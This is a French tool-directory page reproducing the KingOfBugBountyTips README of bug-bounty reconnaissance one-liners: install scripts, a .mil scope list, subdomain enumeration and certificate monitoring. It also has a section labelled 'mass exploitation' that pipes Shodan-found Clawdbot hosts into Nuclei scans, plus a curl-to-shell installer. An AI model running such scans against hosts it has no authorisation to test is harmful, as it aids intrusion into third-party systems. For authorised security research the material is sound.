Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
KingOfBugBountyTips — Notre objectif principal est de partager des astuces de certains chasseurs de bugs bien connus. En utilisant une méthodologie de reconnaissance, nous sommes capables de trouver des sous-domaines, des API et des tokens déjà exploitables, afin de pouvoir les signaler. Nous souhaitons influencer Onelinetips et expliquer les commandes, pour une meilleure compréhension des nouveaux chasseurs.. | Kitploit
Outils/GitHubGitHub/kingofbugbounty/kingofbugbountytips
OSINT (Renseignement de Sources Ouvertes)ReconnaissanceScanners de VulnérabilitésSécurité WebTests d'IntrusionÉnumération de Sous-domainesApprentissage et ÉducationRessources Organisées

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Notre objectif principal est de partager des astuces de certains chasseurs de bugs bien connus. En utilisant une méthodologie de reconnaissance, nous sommes capables de trouver des sous-domaines, des API et des tokens déjà exploitables, afin de pouvoir les signaler. Nous souhaitons influencer Onelinetips et expliquer les commandes, pour une meilleure compréhension des nouveaux chasseurs..

GitHub
kingofbugbounty/kingofbugbountytips

KingOfBugBountyTips

Voir le dépôt
5.5k98412il y a 2 moisVérifié par Kitploit
Partager

KingOfBugBountyTips

Reconnaissance Tactique

L'Arsenal Ultime de Reconnaissance pour Bug Bounty

"Dans l'ombre nous chassons, dans le code nous faisons confiance"


Étoiles Forks Dernier commit Licence


Telegram | Twitter | YouTube | LinkedIn


DoD VDP Scope

Programme de Divulgation de Vulnérabilités du DoD | KingRecon DOD

Périmètre complet du DoD - 19 Domaines```bash # BBRF Scope - All DoD Domains bbrf inscope add '*.af.mil' '*.army.mil' '*.marines.mil' '*.navy.mil' '*.spaceforce.mil' '*.ussf.mil' '*.pentagon.mil' '*.osd.mil' '*.disa.mil' '*.dtra.mil' '*.dla.mil' '*.dcma.mil' '*.dtic.mil' '*.dau.mil' '*.health.mil' '*.ng.mil' '*.uscg.mil' '*.socom.mil' '*.dds.mil' '*.yellowribbon.mil' ``` | Branches Militaires | Agences du DoD | Commandes de Soutien | |:-----------------|:-------------|:-----------------| | `*.af.mil` - Air Force | `*.pentagon.mil` - QG du Pentagone | `*.dtic.mil` - Centre d'information technique | | `*.army.mil` - Armée de terre | `*.osd.mil` - Bureau du SecDef | `*.dau.mil` - Université de l'acquisition | | `*.marines.mil` - Marines | `*.disa.mil` - Systèmes d'information de la Défense | `*.health.mil` - Santé militaire | | `*.navy.mil` - Marine | `*.dtra.mil` - Réduction des menaces | `*.ng.mil` - Garde nationale | | `*.spaceforce.mil` - Force spatiale | `*.dla.mil` - Agence logistique | `*.uscg.mil` - Garde côtière | | `*.ussf.mil` - Force spatiale | `*.dcma.mil` - Gestion des contrats | `*.socom.mil` - Opérations spéciales |

Sécurité

Ce dépôt est UNIQUEMENT destiné à des tests ÉDUCATIFS et AUTORISÉS. Obtenez toujours une autorisation appropriée avant de tester.

📜 Cliquez pour lire notre politique de sécurité et nos directives

✅ Cas d'utilisation autorisés

  • ✅ Programmes de bug bounty autorisés - HackerOne, Bugcrowd, Intigriti, etc.
  • ✅ Tests de pénétration autorisés - Avec autorisation écrite
  • ✅ Environnements de laboratoire personnels - Votre propre infrastructure
  • ✅ Fins éducatives - Apprentissage et recherche
  • ✅ Programme VDP du DoD - En respectant les règles du programme

❌ Activités interdites

  • ❌ Tests non autorisés - Tester sans autorisation explicite
  • ❌ Intentions malveillantes - Utiliser les techniques pour nuire ou voler
  • ❌ Tests hors périmètre - Tester des cibles en dehors du périmètre du programme
  • ❌ Ingénierie sociale - Sauf autorisation explicite du programme
  • ❌ Attaques DoS/DDoS - Attaques par épuisement des ressources

📋 Directives de divulgation responsable

  1. Lisez la politique du programme - Consultez toujours le périmètre et les règles
  2. Testez en toute sécurité - Ne causez pas de dommages aux systèmes de production
  3. Documentez tout - Gardez des notes détaillées de vos découvertes
  4. Signalez en privé - Utilisez les canaux officiels pour la divulgation
  5. Donnez du temps pour corriger - Accordez aux fournisseurs un délai raisonnable pour corriger
  6. Soyez professionnel - Maintenez des normes éthiques

🔒 Signaler des problèmes de sécurité


📚 Table des matières

Cliquez pour déplier la navigation

🎯 À propos

```ascii ╔═══════════════════════════════════════════════════════════════╗ ║ 🎯 MISSION STATEMENT 🎯 ║ ╠═══════════════════════════════════════════════════════════════╣ ║ Share elite bug bounty techniques from world-class hunters ║ ║ Build the most comprehensive one-liner collection ║ ║ Empower the security research community ║ ╚═══════════════════════════════════════════════════════════════╝ ```

Notre objectif principal est de partager les astuces de chasseurs de bugs renommés. Grâce à une méthodologie de reconnaissance avancée, nous découvrons des sous-domaines, des API, des tokens et des vulnérabilités exploitables. Nous souhaitons influencer et éduquer la communauté avec des techniques puissantes en une seule ligne pour une meilleure compréhension et des résultats plus rapides.

🏆 Qu'est-ce qui rend ce dépôt spécial ?

📦 Ressources Spéciales

BugBuntu KingRecon Contribute

📊 Points Forts du Dépôt

📈 Cliquez pour voir les statistiques détaillées

🚀 Démarrage Rapide

⚡ Lancez votre première reconnaissance en moins de 5 minutes

1️⃣ Installer les Outils

Time
```bash # 📥 Step 1: Install essential tools (ProjectDiscovery Suite) go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

🔍 Step 2: Run your first reconnaissance chain

subfinder -d target.com -silent | httpx -silent | nuclei -severity critical,high

🎉 Step 3: Analyze results and profit!

Check the output for vulnerabilities and start reporting!

root@kitploit:~
<details>
<summary><b>🎬 Vous voulez un workflow automatisé complet ? Cliquez ici !</b></summary>

<br>```bash
# 🚀 Advanced Quick Start - Complete Recon Pipeline
TARGET="target.com"

# Subdomain enumeration with multiple sources
subfinder -d $TARGET -all -silent | \
httpx -silent -title -status-code -tech-detect -follow-redirects | \
tee subdomains_live.txt

# Deep crawling and parameter discovery
cat subdomains_live.txt | katana -silent -d 3 -jc | \
grep -E '\\.js$' | \
httpx -silent -mc 200 | \
tee js_files.txt

# Vulnerability scanning with Nuclei
nuclei -l subdomains_live.txt -severity critical,high,medium -silent -o nuclei_results.txt

# 💎 Results saved in:
# - subdomains_live.txt (Live domains)
# - js_files.txt (JavaScript files)
# - nuclei_results.txt (Vulnerabilities found)

🎯 Conseils Pro pour Débutants


🛠️ Outils Requis

Cliquez pour développer la liste complète des outils

Outils de Base


📊 Analyses du dépôt


💖 Soutenir le projet

Si ce dépôt vous a aidé dans votre parcours de bug bounty, pensez à soutenir le projet !

Buy Me A Coffee

⭐ Montrez votre soutien

Donnez une étoile à ce dépôt si vous l'avez trouvé utile !

GitHub stars


📜 Licence & Légal

License

⚠️ Avertissement important

```ascii ╔═══════════════════════════════════════════════════════════════╗ ║ ⚠️ LEGAL NOTICE ⚠️ ║ ╠═══════════════════════════════════════════════════════════════╣ ║ This repository is for EDUCATIONAL PURPOSES ONLY ║ ║ ║ ║ ✅ DO: Use for authorized security testing ║ ║ ✅ DO: Learn and understand the techniques ║ ║ ✅ DO: Contribute and share knowledge ║ ║ ║ ║ ❌ DON'T: Use for unauthorized testing ║ ║ ❌ DON'T: Use for malicious purposes ║ ║ ❌ DON'T: Violate laws or regulations ║ ║ ║ ║ The authors are NOT responsible for any misuse or damage ║ ║ caused by this information. Always test responsibly! ║ ╚═══════════════════════════════════════════════════════════════╝ ```

🔗 Liens rapides et ressources


🌟 Remerciements spéciaux

À tous les contributeurs, chasseurs de bug bounty et la communauté de la sécurité qui rendent ce projet possible !


Dernière mise à jour : Juillet 2026 | Version : 4.6



```ascii ╔══════════════════════════════════════════════════════════════════╗ ║ "Stay curious, stay ethical, stay hungry" 🏴‍☠️ ║ ║ Happy Hunting! 💀 ║ ╚══════════════════════════════════════════════════════════════════╝

root@kitploit:~
<br>

**Fait avec ❤️ par la communauté Bug Bounty**

</div>
Télécharger l’outil

Vous avez trouvé un problème de sécurité dans ce dépôt ? Veuillez le signaler de manière responsable :

Signaler un problème

SectionDescription
À proposAperçu du projet et objectifs
Démarrage rapideCommencez en 5 minutes
Outils requisEnsemble d'outils essentiel
Périmètre BBRF DoDConfiguration du périmètre DoD
Énumération de sous-domainesTrouver des sous-domaines
Recon JavaScriptAnalyse des fichiers JS
Détection XSSCross-site scripting
Injection SQLTechniques SQLi
SSRF et SSTIAttaques côté serveur
Web CrawlingMéthodes de crawling approfondi
Découverte de paramètresParamètres cachés
Découverte de contenuFichiers sensibles
Scanning NucleiAnalyse automatisée
Tests de sécurité APIVulnérabilités API
Sécurité CloudAWS, GCP, Azure
Scripts d'automatisationScripts prêts à l'emploi
Fonctions BashProductivité shell
Nouvelles oneliners 2026Exploits et techniques CVE-2026
Oneliners 2024-2025Techniques précédentes
Découverte CVE février 2026Dernières oneliners de reconnaissance CVE
Moteurs de rechercheMoteurs de recherche pour hackers
WordlistsMeilleures wordlists
RessourcesLivres, cours, blogs
Oneliners
💎 Commandes Sélectionnées
Éprouvées au combat par de vrais chasseurs
Methodology
🎯 Méthodologie Complète
De la reconnaissance à l'exploitation
Updated
🔄 Constamment Mis à Jour
Nouvelles techniques chaque semaine
Community
🌍 Piloté par la Communauté
Meilleurs chasseurs du monde entier
CatégorieNombreStatut
One-Liners400+✅ Actif
Techniques50+✅ Actif
Outils Couverts100+✅ Actif
Exemples CVE20+✅ Actif
Domaines DoD19✅ Actif
ContributeursEn croissance🚀 En croissance
Dernière Mise à Jour2026✅ À jour

2️⃣ Lancer la Reconnaissance

Time

3️⃣ Trouver des Bugs

Time
ConseilDescription
🔑Obtenez toujours une autorisation appropriée avant de tester
📝Conservez des notes détaillées de vos découvertes
🛠️Commencez par les outils automatisés, puis les tests manuels
💰Concentrez-vous d'abord sur les vulnérabilités à fort impact
🤝Rejoignez la communauté et apprenez des autres
CatégorieOutilsInstallation
Sous-domainesSubfinder, Amass, Assetfinder, Findomain, Chaosgo install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
Sondage HTTPHttpx, Httprobego install github.com/projectdiscovery/httpx/cmd/httpx@latest
ExplorationKatana, Gospider, Hakrawler, Cariddigo install github.com/projectdiscovery/katana/cmd/katana@latest
URLsGau, Waybackurls, Waymorego install github.com/lc/gau/v2/cmd/gau@latest
AnalyseNuclei, Jaeles, Naabugo install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
XSSDalfox, XSStrike, Kxss, Airixssgo install github.com/hahwul/dalfox/v2@latest
SQLiSQLMap, Ghauripip install sqlmap ghauri
UtilitairesAnew, Qsreplace, Unfurl, Gf, Urogo install github.com/tomnomnom/anew@latest
FuzzingFfuf, Feroxbustergo install github.com/ffuf/ffuf/v2@latest
Analyse JSSubjs, LinkFinder, SecretFinder, Jsubfindergo install github.com/lc/subjs@latest
Surveillance des certificatsCertstream, Certstream-gopip install certstream
DNSDnsx, Shuffledns, PureDNS, MassDNS, Dnsgengo install github.com/projectdiscovery/dnsx/cmd/dnsx@latest
DNS inverséHakrevdns, Pripsgo install github.com/hakluke/hakrevdns@latest
Découverte d'APIArjun, x8, ParamSpiderpip install arjun
Captures d'écranGowitness, Eyewitnessgo install github.com/sensepost/gowitness@latest
CloudAWS CLI, CloudEnum, S3Scannerpip install awscli
OSINTShodan CLI, Censys, Metabigorpip install shodan censys
Reconnaissance GitTrufflehog, Gitrob, Github-Subdomainsgo install github.com/trufflesecurity/trufflehog/v3@latest
Gestion du périmètreBBRFpip install bbrf

Dépendances Système```bash

Ubuntu/Debian

sudo apt update && sudo apt install -y
jq
curl
wget
git
python3
python3-pip
golang-go
nmap
masscan
chromium-browser
parallel
whois
dnsutils
libpcap-dev
build-essential

macOS

brew install jq curl wget git python3 go nmap masscan chromium parallel whois bind

root@kitploit:~
### Configuration de l'environnement Go```bash
# Add to ~/.bashrc or ~/.zshrc
export GOPATH=$HOME/go
export GOROOT=/usr/local/go
export PATH=$PATH:$GOPATH/bin:$GOROOT/bin

# Reload shell
source ~/.bashrc  # or source ~/.zshrc

Script d'installation rapide - Go Tools```bash

#!/bin/bash

One-click install for all Go tools

echo "[*] Installing Go tools..." go_tools=( # ProjectDiscovery "github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest" "github.com/projectdiscovery/httpx/cmd/httpx@latest" "github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest" "github.com/projectdiscovery/katana/cmd/katana@latest" "github.com/projectdiscovery/naabu/v2/cmd/naabu@latest" "github.com/projectdiscovery/dnsx/cmd/dnsx@latest" "github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest" "github.com/projectdiscovery/chaos-client/cmd/chaos@latest" # Tomnomnom "github.com/tomnomnom/waybackurls@latest" "github.com/tomnomnom/anew@latest" "github.com/tomnomnom/qsreplace@latest" "github.com/tomnomnom/unfurl@latest" "github.com/tomnomnom/gf@latest" "github.com/tomnomnom/assetfinder@latest" "github.com/tomnomnom/httprobe@latest" # Fuzzing & Crawling "github.com/ffuf/ffuf/v2@latest" "github.com/jaeles-project/gospider@latest" "github.com/hakluke/hakrawler@latest" "github.com/hakluke/hakrevdns@latest" # Security "github.com/hahwul/dalfox/v2@latest" "github.com/lc/gau/v2/cmd/gau@latest" "github.com/lc/subjs@latest" # Screenshots & Utils "github.com/sensepost/gowitness@latest" "github.com/d3mondev/puredns/v2@latest" "github.com/j3ssie/metabigor@latest" "github.com/Emoe/kxss@latest" "github.com/ferreiraklet/airixss@latest" "github.com/edoardottt/cariddi/cmd/cariddi@latest" "github.com/trufflesecurity/trufflehog/v3@latest" )

for tool in "${go_tools[@]}"; do echo "[+] Installing $tool" go install -v "$tool" 2>/dev/null done

echo "[✓] Go tools installed!"

root@kitploit:~
### Script d'installation rapide - Outils Python```bash
#!/bin/bash
# One-click install for all Python tools

echo "[*] Installing Python tools..."

pip3 install --upgrade pip

pip3 install \
    certstream \
    sqlmap \
    ghauri \
    uro \
    arjun \
    paramspider \
    shodan \
    censys \
    bbrf \
    dnsgen \
    waymore \
    xsstrike \
    s3scanner \
    cloud_enum \
    trufflehog

echo "[✓] Python tools installed!"

Script d'installation rapide - Outils Rust (Feroxbuster)```bash

#!/bin/bash

Install Feroxbuster (Rust)

echo "[*] Installing Rust tools..."

Install Rust if not present

if ! command -v cargo &> /dev/null; then curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y source $HOME/.cargo/env fi

Install Feroxbuster

cargo install feroxbuster

echo "[✓] Rust tools installed!"

root@kitploit:~
### Script d'installation rapide - Outils externes```bash
#!/bin/bash
# Install tools that require cloning

echo "[*] Installing external tools..."

TOOLS_DIR="$HOME/tools"
mkdir -p $TOOLS_DIR && cd $TOOLS_DIR

# LinkFinder
git clone https://github.com/GerbenJavado/LinkFinder.git
cd LinkFinder && pip3 install -r requirements.txt && cd ..

# SecretFinder
git clone https://github.com/m4ll0k/SecretFinder.git
cd SecretFinder && pip3 install -r requirements.txt && cd ..

# Findomain
wget https://github.com/Findomain/Findomain/releases/latest/download/findomain-linux.zip
unzip findomain-linux.zip && chmod +x findomain && sudo mv findomain /usr/local/bin/

# MassDNS
git clone https://github.com/blechschmidt/massdns.git
cd massdns && make && sudo mv bin/massdns /usr/local/bin/ && cd ..

# Amass
go install -v github.com/owasp-amass/amass/v4/...@master

# GF Patterns
git clone https://github.com/1ndianl33t/Gf-Patterns.git
mkdir -p ~/.gf && cp Gf-Patterns/*.json ~/.gf/

echo "[✓] External tools installed!"

Script d'installation maître (Tout-en-un)```bash

#!/bin/bash

MASTER INSTALLER - Run all installation scripts

echo "╔══════════════════════════════════════════════════════════╗" echo "║ KingOfBugBounty - Complete Tool Installation ║" echo "╚══════════════════════════════════════════════════════════╝"

System dependencies (run with sudo)

echo "[1/5] Installing system dependencies..." sudo apt update && sudo apt install -y jq curl wget git python3 python3-pip golang-go nmap masscan chromium-browser parallel whois dnsutils libpcap-dev build-essential

Go environment

echo "[2/5] Setting up Go environment..." echo 'export GOPATH=$HOME/go' >> ~/.bashrc echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc source ~/.bashrc

Go tools

echo "[3/5] Installing Go tools..." go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest go install -v github.com/projectdiscovery/katana/cmd/katana@latest go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest go install -v github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest go install -v github.com/tomnomnom/waybackurls@latest go install -v github.com/tomnomnom/anew@latest go install -v github.com/tomnomnom/qsreplace@latest go install -v github.com/tomnomnom/unfurl@latest go install -v github.com/tomnomnom/gf@latest go install -v github.com/tomnomnom/assetfinder@latest go install -v github.com/ffuf/ffuf/v2@latest go install -v github.com/hahwul/dalfox/v2@latest go install -v github.com/lc/gau/v2/cmd/gau@latest go install -v github.com/jaeles-project/gospider@latest go install -v github.com/hakluke/hakrawler@latest go install -v github.com/hakluke/hakrevdns@latest go install -v github.com/sensepost/gowitness@latest go install -v github.com/d3mondev/puredns/v2@latest go install -v github.com/owasp-amass/amass/v4/...@master

Python tools

echo "[4/5] Installing Python tools..." pip3 install certstream sqlmap ghauri uro arjun shodan censys bbrf dnsgen waymore

Rust tools

echo "[5/5] Installing Rust tools..." if ! command -v cargo &> /dev/null; then curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y source $HOME/.cargo/env fi cargo install feroxbuster

Update Nuclei templates

nuclei -update-templates

echo "" echo "╔══════════════════════════════════════════════════════════╗" echo "║ ✓ Installation Complete! ║" echo "╚══════════════════════════════════════════════════════════╝" echo "" echo "Run 'source ~/.bashrc' to reload your environment"

root@kitploit:~
### Installation des listes de mots```bash
#!/bin/bash
# Install essential wordlists

WORDLIST_DIR="$HOME/wordlists"
mkdir -p $WORDLIST_DIR && cd $WORDLIST_DIR

# SecLists
git clone https://github.com/danielmiessler/SecLists.git

# Assetnote Wordlists
wget -r --no-parent -R "index.html*" https://wordlists-cdn.assetnote.io/data/ -nH

# OneListForAll
git clone https://github.com/six2dez/OneListForAll.git

# Resolvers
wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers.txt -O resolvers.txt
wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt -O resolvers-trusted.txt

echo "[✓] Wordlists installed in $WORDLIST_DIR"

Vérifier l'installation```bash

#!/bin/bash

Verify all tools are installed

echo "Checking installed tools..."

tools=("subfinder" "httpx" "nuclei" "katana" "naabu" "dnsx" "ffuf" "feroxbuster" "dalfox" "gau" "waybackurls" "anew" "qsreplace" "gf" "gospider" "hakrawler" "amass" "gowitness" "certstream" "sqlmap" "arjun" "shodan")

for tool in "${tools[@]}"; do if command -v $tool &> /dev/null; then echo "[✓] $tool" else echo "[✗] $tool - NOT FOUND" fi done

root@kitploit:~
</details>

---

## 🎯 BBRF Scope DoD```bash
# Add all DoD domains to BBRF scope
bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil' '*.spaceforce.mil' '*.ussf.mil'

💀 Énumération de sous-domaines ☠️

``` ███████╗██╗ ██╗██████╗ ██████╗ ██████╗ ███╗ ███╗ █████╗ ██╗███╗ ██╗ ██╔════╝██║ ██║██╔══██╗██╔══██╗██╔═══██╗████╗ ████║██╔══██╗██║████╗ ██║ ███████╗██║ ██║██████╔╝██║ ██║██║ ██║██╔████╔██║███████║██║██╔██╗ ██║ ╚════██║██║ ██║██╔══██╗██║ ██║██║ ██║██║╚██╔╝██║██╔══██║██║██║╚██╗██║ ███████║╚██████╔╝██████╔╝██████╔╝╚██████╔╝██║ ╚═╝ ██║██║ ██║██║██║ ╚████║ ╚══════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝ ``` **☠️ ÉNUMÉRER TOUT ☠️**

💀 Découverte Multi-Source (Tout-en-Un)```bash

☠️ Ultimate subdomain enumeration - All tools combined

subfinder -d target.com -all -silent | anew subs.txt amass enum -passive -d target.com | anew subs.txt assetfinder -subs-only target.com | anew subs.txt chaos -d target.com -silent | anew subs.txt findomain -t target.com -q | anew subs.txt cat subs.txt | httpx -silent -threads 200 | anew alive.txt

root@kitploit:~
### 💀 Journaux de transparence des certificats```bash
# ☠️ crt.sh extraction
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | httpx -silent

💀 Surveillance en temps réel de Certstream - Basique```bash

☠️ Monitor certificates in real-time for specific keyword

pip install certstream && python3 -c "import certstream; certstream.listen_for_events(lambda msg, ctx: print(msg['data']['leaf_cert']['subject']['CN']) if 'target' in str(msg.get('data',{}).get('leaf_cert',{}).get('subject',{}).get('CN','')) else None, url='wss://certstream.calidog.io/')"

root@kitploit:~
### 💀 Certstream avec Filtre de Domaine```bash
# ☠️ Real-time cert monitoring filtered by domain keywords
certstream --full | jq -r 'select(.data.leaf_cert.subject.CN != null) | .data.leaf_cert.subject.CN' | grep -iE "(target|company|brand)" | anew certstream_targets.txt

💀 Certstream vers la découverte de sous-domaines```bash

☠️ Extract all SANs (Subject Alternative Names) in real-time

certstream --full | jq -r '.data.leaf_cert.extensions.subjectAltName // empty' | tr ',' '\n' | sed 's/DNS://g' | grep -E "target.com$" | sort -u | anew certstream_subs.txt

root@kitploit:~
### 💀 Certstream + httpx Pipeline en direct```bash
# ☠️ Real-time cert discovery -> immediate alive check
certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' 2>/dev/null | grep -iE "target" | sort -u | while read domain; do echo "$domain" | httpx -silent -timeout 3 | anew live_certs.txt; done

💀 Certstream Détection de phishing```bash

☠️ Monitor for potential phishing domains (brand impersonation)

certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "(paypal|apple|google|microsoft|amazon|facebook|netflix|bank)" | grep -vE ".(paypal|apple|google|microsoft|amazon|facebook|netflix).com$" | anew phishing_certs.txt

root@kitploit:~
### 💀 Certstream avec Nuclei Auto-Scan```bash
# ☠️ Real-time cert discovery -> automatic vulnerability scan
certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -E "\.target\.com$" | sort -u | while read domain; do echo "https://$domain" | nuclei -t /nuclei-templates/technologies/ -silent; done

💀 Script de collecte en masse Certstream```bash

☠️ Collect all certificates for specific TLDs

timeout 3600 bash -c 'certstream --full | jq -r ".data.leaf_cert.all_domains[]? // empty" | grep -E ".(gov|mil|edu)$" | anew gov_mil_edu_certs.txt' &

root@kitploit:~
### 💀 Chasseur de certificats génériques Certstream```bash
# ☠️ Find wildcard certificates (*.domain.com) in real-time
certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep "^\*\." | sed 's/^\*\.//' | sort -u | anew wildcard_domains.txt

💀 Enrichissement Certstream + Shodan```bash

☠️ Real-time certs -> resolve IP -> Shodan lookup

certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "target" | while read domain; do IP=$(dig +short "$domain" | head -1); [ -n "$IP" ] && echo "$domain,$IP,$(shodan host $IP 2>/dev/null | head -3 | tr '\n' ' ')"; done | anew cert_shodan.txt

root@kitploit:~
### 💀 Logger JSON Certstream avec Horodatage```bash
# ☠️ Full certificate logging with timestamps for analysis
certstream --full | jq -c '{timestamp: now | strftime("%Y-%m-%d %H:%M:%S"), cn: .data.leaf_cert.subject.CN, domains: .data.leaf_cert.all_domains, issuer: .data.leaf_cert.issuer.O}' | grep -i "target" | tee -a certstream_log.json

💀 Certstream Moniteur de périmètre de bug bounty```bash

☠️ Monitor multiple bug bounty targets simultaneously

TARGETS="hackerone|bugcrowd|intigriti|yeswehack"; certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -iE "$TARGETS" | anew bb_new_assets.txt &

root@kitploit:~
### 💀 Shodan + Nuclei Pipeline```bash
# ☠️ Shodan recon -> Nuclei scan
shodan domain target.com | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high

💀 Découverte de Clawdbot via Shodan (Exploitation de masse)

⚡ 1. Trouver des instances Clawdbot - Recherche de base```bash

💀 Locate Clawdbot servers exposed on the internet

shodan search "Clawdbot" --fields ip_str,port,hostnames,org | awk '{print $1":"$2}' | anew clawdbot_targets.txt

root@kitploit:~
#### ⚡ 2. Clawdbot : Découverte des en-têtes HTTP```bash
# 💀 Find servers with Clawdbot in HTTP headers
shodan search "http.headers:Clawdbot" --fields ip_str,port,http.title | tee clawdbot_http.txt | wc -l && echo "targets found"

⚡ 3. Clawdbot User-Agent Detection```bash

💀 Detect Clawdbot via User-Agent strings

shodan search "http.user_agent:Clawdbot" --fields ip_str,port,org,hostnames | awk -F'\t' '{print "https://"$1":"$2" - "$3}' | anew clawdbot_ua.txt

root@kitploit:~
#### ⚡ 4. Pipeline d'exploitation Clawdbot + Nuclei```bash
# 💀 Mass Clawdbot discovery -> httpx alive -> Nuclei scan
shodan search "Clawdbot" --fields ip_str,port --limit 1000 | awk '{print $1":"$2}' | httpx -silent | nuclei -t ~/nuclei-templates/ -severity critical,high -o clawdbot_vulns.txt

⚡ 5. Empreinte du serveur Clawdbot```bash

💀 Extract detailed server info from Clawdbot hosts

shodan search "Clawdbot" --fields ip_str,port,os,product,version,org | sort -t$'\t' -k4 | anew clawdbot_fingerprint.txt

root@kitploit:~
#### ⚡ 6. Analyse de la distribution ASN de Clawdbot```bash
# 💀 Map Clawdbot instances by ASN for targeted reconnaissance
shodan search "Clawdbot" --fields ip_str,asn,org | awk '{print $2}' | sort | uniq -c | sort -rn | head -20 | tee clawdbot_asn_stats.txt

⚡ 7. Répartition géographique de Clawdbot```bash

💀 Find Clawdbot by country for geo-targeted testing

for country in US BR DE FR GB RU CN JP KR IN; do echo "=== $country ===" && shodan search "Clawdbot country:$country" --fields ip_str,port,city --limit 100 | anew clawdbot_${country}.txt; done

root@kitploit:~
#### ⚡ 8. Clawdbot + Port Range Scan```bash
# 💀 Discover Clawdbot on common web ports
shodan search "Clawdbot port:80,443,8080,8443,8000,3000,5000" --fields ip_str,port,http.server | awk '{print $1":"$2}' | httpx -silent -status-code -title | anew clawdbot_webports.txt

⚡ 9. Analyse des certificats SSL de Clawdbot```bash

💀 Extract Clawdbot hosts with SSL certificate info

shodan search "Clawdbot ssl:true" --fields ip_str,port,ssl.cert.subject.CN,ssl.cert.issuer.O | sort -u | anew clawdbot_ssl.txt

root@kitploit:~
#### ⚡ 10. Clawdbot Moniteur en temps réel + Alerte```bash
# 💀 Continuous monitoring for new Clawdbot instances
while true; do shodan search "Clawdbot" --fields ip_str,port,timestamp --limit 50 | sort -t$'\t' -k3 -r | head -10 | anew clawdbot_new.txt && sleep 3600; done &

💀 Découverte ASN & DNS inversé```bash

☠️ Find all IPs from organization ASN

echo 'target_org' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]+.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew'

root@kitploit:~
### 💀 Brute force DNS avec Shuffledns```bash
shuffledns -d target.com -w wordlist.txt -r resolvers.txt -silent | httpx -silent | anew

💀 Énumération récursive de sous-domaines```bash

subfinder -d target.com -recursive -all -silent | dnsx -silent | httpx -silent | anew recursive_subs.txt

root@kitploit:~
### 💀 DNS Passif - Sources Multiples```bash
# ☠️ HackerTarget
curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1 | anew subs.txt

# ☠️ RapidDNS
curl -s "https://rapiddns.io/subdomain/target.com?full=1" | grep -oP '(?<=target="_blank">)[^<]+' | grep "target.com" | anew subs.txt

# ☠️ Riddler.io
curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -oP '\b([a-zA-Z0-9](https://github.com/kingofbugbounty/kingofbugbountytips/blob/master/%5Ba-zA-Z0-9-%5D%2A%5Ba-zA-Z0-9%5D)?\.)+target\.com\b' | anew subs.txt

# ☠️ AlienVault OTX
curl -s "https://otx.alienvault.com/api/v1/indicators/domain/target.com/passive_dns" | jq -r '.passive_dns[].hostname' 2>/dev/null | sort -u | anew subs.txt

# ☠️ URLScan.io
curl -s "https://urlscan.io/api/v1/search/?q=domain:target.com" | jq -r '.results[].page.domain' 2>/dev/null | sort -u | anew subs.txt

💀 Scraping de sous-domaines GitHub```bash

github-subdomains -d target.com -t YOUR_GITHUB_TOKEN -o github_subs.txt

root@kitploit:~
### 💀 Découverte de sous-domaines Censys```bash
# ☠️ Using Censys API
censys search "target.com" --index-type hosts | jq -r '.[] | .name' | sort -u | anew censys_subs.txt

💀 SecurityTrails API```bash

☠️ SecurityTrails subdomain enumeration

curl -s "https://api.securitytrails.com/v1/domain/target.com/subdomains" -H "APIKEY: YOUR_API_KEY" | jq -r '.subdomains[]' | sed 's/$/.target.com/' | anew subs.txt

root@kitploit:~
### 💀 Sous-domaines Wayback Machine```bash
# ☠️ Extract subdomains from Wayback Machine
